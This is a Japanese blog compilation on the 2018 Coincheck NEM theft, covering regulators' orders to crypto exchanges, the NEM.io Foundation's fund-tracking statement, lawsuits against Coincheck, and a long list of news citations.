コインチェックのNEM.io財団との接触

所管官庁、関係組織・団体の動き

局長級連絡会議
警視庁
金融庁
発出対象業者命令命令内容
ビットステーション株式会社業務停止命令及び業務改善命令(1)業務停止命令
平成30年3月8日から平成30年4月7日までの間、仮想通貨交換業に係る全ての業務を停止(利用者財産の返還のための業務等を除く)

(2)業務改善命令
適正かつ確実な業務運営を確保するための以下の対応
1)利用者財産の残高確認・照合等を適切に実施するための態勢整備
2)利用者財産の移動及び処分を適切に実施するための態勢整備
3)利用者財産を適切に管理するための態勢整備
上記1)から3)の対応・実施状況について、講じた措置の内容を平成30年3月22日までに、書面で提出
FSHO株式会社業務停止命令及び業務改善命令(1) 業務停止命令
平成30年3月8日から平成30年4月7日までの間、仮想通貨交換業に係る全ての業務を停止(仮想通貨の交換等に関し利用者に対して負担する債務の履行等を除く)

(2) 業務改善命令
適正かつ確実な業務運営を確保するための以下の対応
i.これまでの取引に関する取引時確認の実施及び疑わしい取引の届出の実行
ii.上記i.を確実に行うための態勢構築
iii.利用者情報の安全管理を図るための態勢構築
iv.法定帳簿の記載の適切な実施のための態勢構築
上記i.からiv.までの事項について、講じた措置の内容を平成30年3月22日までに書面で提出
コインチェック株式会社業務改善命令(1) 適正かつ確実な業務運営を確保するための以下の対応
i.経営体制の抜本的な見直し
ii.経営戦略を見直し、顧客保護を徹底
iii.取締役会による各種態勢の整備
iv.取り扱う仮想通貨について、各種リスクの洗出し
v.マネー・ローンダリング及びテロ資金供与に係る対策
vi.現在停止中の取引再開及び新規顧客のアカウント開設に先立ち、各種態勢の抜本的な見直し、実効性の確保
(2) 顧客との取引及び顧客に対する補償に関し、当局に対し適切な報告
(3) 上記(1)に関する業務改善計画を平成30年3月22日までに、書面で提出
(4) 業務改善計画の実施完了までの間、1ヶ月毎の進捗・実施状況を翌月10日までに、書面で報告
テックビューロ株式会社業務改善命令適正かつ確実な業務運営を確保するための以下の対応
  (1)実効性あるシステムリスク管理態勢の構築
  (2)適切に顧客対応するための態勢の構築
  (3)上記(1)及び(2)に関する業務改善計画を、平成30年3月22日までに書面で提出
  (4)上記(3)の業務改善計画の実施完了までの間、1ヶ月毎の進捗・実施状況を翌月10日までに書面で報告
GMOコイン株式会社業務改善命令適正かつ確実な業務運営を確保するための以下の対応
(1) 業容の拡大等実態に応じた実効性あるシステムリスク管理態勢の構築
(2) 上記(1)に関する業務改善計画を、平成30年3月22日までに書面で提出
(3) 上記(2)の業務改善計画の実施完了までの間、1ヶ月毎の進捗・実施状況を翌月10日までに書面で報告
バイクリメンツ株式会社業務改善命令適正かつ確実な業務運営を確保するための以下の対応
(1) 経営管理態勢の構築
(2) マネー・ローンダリング及びテロ資金供与に係る管理態勢の構築
(3) 利用者財産の分別管理態勢及び帳簿書類の管理態勢の構築
(4) システムリスク管理態勢の構築
上記(1)から(4)までの事項について、講じた措置の内容を平成30年3月22日までに、書面で報告
株式会社ミスターエクスチェンジ業務改善命令適正かつ確実な業務運営を確保するための以下の対応
 (1)経営管理態勢の構築
 (2)利用者財産の分別管理態勢の構築
 (3)システムリスク管理態勢の構築
 (4)マネー・ローンダリング及びテロ資金供与に係る管理態勢の構築
 (5)苦情処理管理態勢の構築
 上記(1)から(5)までの事項について、講じた措置の内容を平成30年3月22日までに、書面で報告すること。
内閣サイバーセキュリティセンター
NEM.io財団

Beginning March 18, the NEM.io Foundation has disabled the tracking mosaic that was put into place to monitor XEM movements from the Coincheck theft. This effort was effective at reducing the hacker’s ability to liquidate stolen XEM and provided law enforcement with actionable information. We don’t plan to release further details due to the sensitive nature of this investigation.

日本商工会議所
日本仮想通貨事業者協会
日本ブロックチェーン協会
ブロックチェーン推進協会
マネックスグループ

コインチェックを相手取った訴訟の動き

2018年2月15日 コインチェック被害対策弁護団による集団提訴
提訴日原告
2018年2月15日関東・東海地方の7人(法人2、個人5)
2018年2月27日132人(法人3、個人129)
2018年1月31日提訴 リップル購入費用返還訴訟
2018年2月8日提訴 コインチェックへのNEMの損害賠償請求
2018年2月26日提訴 コインチェックへ預けていた資産の払い戻しを求める集団訴訟(被害者の会)

その他関連情報

コインチェックの記者会見
コインチェックの仮想通貨交換事業者の登録に関すること
コインチェックが登録前にCMを流していたことに対して

記者会見にて次のように大塚取締役が回答

有志による送金経路のトレース

mizunashi.coincheck_stolen_funds_do_not_accept_trades:owner_of_this_account_is_hacker

port7890に対する不審な通信の観測
コインチェックを偽装した詐欺行為発生の可能性

参考

考察記事等
NEM関連の技術情報等

事案を報じる全国紙等の記事一覧

更新履歴

*11月上旬にメールで感染 コインチェック従業員,日本経済新聞,20189年3月10日アクセス

*2仮想通貨「NEM」 流出3日前と2日前に不正アクセス,NHK,2018年2月8日アクセス

*3ビットコイン取引所「コインチェック」で620億円以上が不正に引き出される被害が発生(追記あり),Yahoo!ニュース,2018年1月27日アクセス

*4Coincheck Theft: "The Biggest Theft in the History of the World",cryptonews,2018年1月27日アクセス

*5https://twitter.com/bitpress/status/957849301601824768

*6仮想通貨流出 金融庁が業務改善命令へ,毎日新聞,2018年1月29日アクセス

*7出川哲朗さん出演のコインチェック広告画像・動画が削除される,ねとらぼ,2018年1月29日アクセス

*8仮想通貨流出 警視庁本格捜査へ,NHK,2018年1月29日アクセス

*9麻生金融相「仮想通貨業者、システム管理を強化」,日本経済新聞,2018年1月30日アクセス

*10通信記録を警視庁に提出 捜査本格化,産経ニュース,2018年2月2日アクセス

*11コインチェックを提訴へ 被害者弁護団を結成,NHK,2018年2月2日アクセス

*12コインチェック、流出始まった時間訂正,産経ニュース,2018年2月2日アクセス

*13コインチェックに立ち入り検査 金融庁 財務内容調べる,NHK,2018年2月2日アクセス

*14コインチェック顧客ら、被害者団体を結成 返金求め訴訟も検討,産経ニュース,2018年2月4日アクセス

*15警視庁、サーバー情報の提供受ける=コインチェック問題,時事通信,2018年2月6日アクセス

*16自民、コインチェック・仮想通貨流出問題で金融庁から聞き取り,Reuters,2018年2月8日アクセス

*17仮想通貨返金、課税所得になりうる 政府が答弁書,日本経済新聞,2018年2月28日アクセス

*18仮想通貨取引所コインチェックからNEM580億円相当が不正流出,Bloomberg,2018年1月27日アクセス

*19流出通貨、売買停止を要請=所在は把握−コインチェック,時事通信,2018年1月29日アクセス

*20仮想通貨流出 飲食店にも影響,NHK,2018年1月29日アクセス

*21NEM不正流出、社員PCのウイルス感染が原因と想定,朝日新聞,2018年3月8日アクセス

*22流出前に複数回の不審接続 コインチェック,日本経済新聞,2018年2月7日アクセス

*23NEM流出以前に社内から欧米へ不審な通信 コインチェック,日本経済新聞,2018年2月28日アクセス

*24仮想通貨流出 海外から不正アクセス 金融庁、改善命令へ,毎日新聞,2018年1月29日アクセス

*25流出前、欧米から不正接続…管理情報狙ったか,読売新聞,2018年2月9日アクセス

*26NEM流出、別の9口座へ送金再開…追跡逃れか,読売新聞,2018年2月1日アクセス

*27NEM、海外取引所へも送金 監視くぐり抜け換金図る?,朝日新聞,2018年2月4日アクセス

*28流出した仮想通貨「NEM」、他コインに交換か ICO応募の形跡,2018年2月4日アクセス

*29流出仮想通貨、「ダークウェブ」で交換持ちかけか,日本経済新聞,2018年2月8日アクセス

*30コインチェック広報担当者「補償の時期は見通し立たず」,NHK,2018年1月29日アクセス

*31「コインチェック」に業務改善命令,TBS,2018年1月29日アクセス

*32コインチェック幹部「顧客への補償は現金などで対応」,NHK,2018年1月29日アクセス

*33コインチェック、全員補償明言も…「返金時期めど立たない」,スポニチ,2018年1月29日アクセス

*34:仮想通貨流出 「返金 自社資産で賄う」コインチェック 金融庁に方針報告,読売新聞,2018年1月29日朝刊記事

*35https://twitter.com/bitpress/status/957864351439847424

*36国税庁に直接聞いてみた!コインチェックのNEM460億円補償に対する税金はどうなるの?,ビットコイン谷,2018年1月30日アクセス

*37https://twitter.com/bitpress/status/957847332254490624

*38https://twitter.com/bitpress/status/957848390422872064

*39コインチェックが580億円のNEM不正流出について説明、補償や取引再開のめどは立たず,techcrunch,2018年1月27日アクセス

*40コインチェック残高確認、午前と午後に1回だけ,読売新聞,2018年2月7日アクセス

*41580億円分の仮想通貨が流出、大手取引所への不正アクセスで,ITpro,2018年1月27日アクセス

*42金融庁 コインチェック仮想通貨流出で行政処分検討の方針,NHK,2018年1月29日アクセス

*43仮想通貨流出 警視庁本格捜査へ 不正アクセス発信源追跡,毎日新聞,2018年2月2日アクセス

*44警視庁がコインチェック関係者近く任意聴取,共同通信,2018年1月29日アクセス

*45「NEM財団」に捜査協力要請,FNN,2018年2月2日アクセス

*46仮想通貨流出 ネム交換の日本人男性聴取 闇ウェブ介し,毎日新聞,2018年2月11日アクセス

*47流出NEM、闇サイトで別の仮想通貨と交換 警視庁確認,朝日新聞,2018年2月11日アクセス

*48NEM流出、警視庁が捜査本部設置へ,日本経済新聞,2018年2月24日アクセス

*49https://twitter.com/okasanman/status/957807041682161664

*50https://twitter.com/bitpress/status/957845226537730049

*51コインチェック立ち入り「利用者保全を確実にする」、麻生太郎金融担当相,産経ニュース,2018年2月2日アクセス

*52コインチェック検査、改善命令の履行状況把握が狙い=麻生金融相,Reuters,2018年2月6日アクセス

*53金融庁、コインチェック常時監視 返金原資を調査,東京新聞,2018年2月4日アクセス

*54報告期限待たず立ち入り 異例の金融庁 コインチェック,朝日新聞,2018年2月2日アクセス

*55経営管理含め報告命令=金融庁、取引所に−仮想通貨流出,時事通信,2018年2月4日アクセス

*56金融庁 仮想通貨、2取引所検査 全社立ち入りへ,毎日新聞,2018年2月9日アクセス

*57仮想通貨、利用者保護を徹底=取引所に立ち入り検査−金融庁,時事通信,2018年2月9日アクセス

*58「内部管理態勢に懸念あった」 コインチェックに麻生氏,朝日新聞,2018年2月7日アクセス

*59NEM.io財団の理事:朝山氏がハッキング事件対応の経過を公表,COINPOST,2018年2月2日アクセス

*60必要な対策、検討を=仮想通貨流出で−日商会頭,時事通信,2018年2月2日アクセス

*61マネックスG、コインチェック買収を発表 全株を36億円で取得,日本経済新聞,2018年4月6日アクセス

*62「仮想通貨そのものを返せ」コインチェック集団訴訟、第1次提訴…弁護団「戦後最大規模の消費者事件」,弁護士ドットコム,2018年2月16日アクセス

*63NEM不正流出、顧客らが集団提訴 返還や損害賠償請求,朝日新聞,2018年2月28日アクセス

*64仮想通貨流出でコインチェック提訴 利用者で初,日本経済新聞,2018年2月8日アクセス

*65「出金停止は不当」顧客がコインチェックを提訴,読売新聞,2018年2月8日アクセス

*66コインチェック利用者が「被害者団体」 訴訟も視野,朝日新聞,2018年2月8日アクセス

*67仮想通貨所有の男性がコインチェックを提訴,NHK,2018年2月8日アクセス

*68コインチェック取引停止、新たに132人が提訴 2億円超分払い戻しなど求める 東京地裁,産経ニュース,2018年2月28日アクセス

*69コインチェック被害者の会が提訴,NHK,2018年2月28日アクセス

*70金融庁、コインチェックの管理懸念=顧客資産流出前に対策要請,時事通信,2018年1月29日アクセス

*71仮想通貨580億円流出のコインチェックとは? アルトコインの取扱いで急成長,BUSINESS INSIDER,2018年1月26日アクセス

*72https://twitter.com/bitpress/status/957848747743985665

*73仮想通貨流出 不特定多数の端末狙う不審な通信 攻撃準備か,NHK,2018年1月31日アクセス

*74「NEM」狙う不審通信、中露など4カ国から観測過去 捜査は国境の壁乗り越えられるか,産経ニュース,2018年2月4日アクセス

*75仮想通貨で“便乗詐欺”か コインチェック装い、送金求める,産経ニュース,2018年1月31日アクセス

*76仮想通貨「NEM」流出に便乗 詐欺未遂容疑で山梨県の大学生を書類送検 奈良県警,産経ニュース,2018年4月6日アクセス

Kango
Kango

piyokangoの日記。備忘録。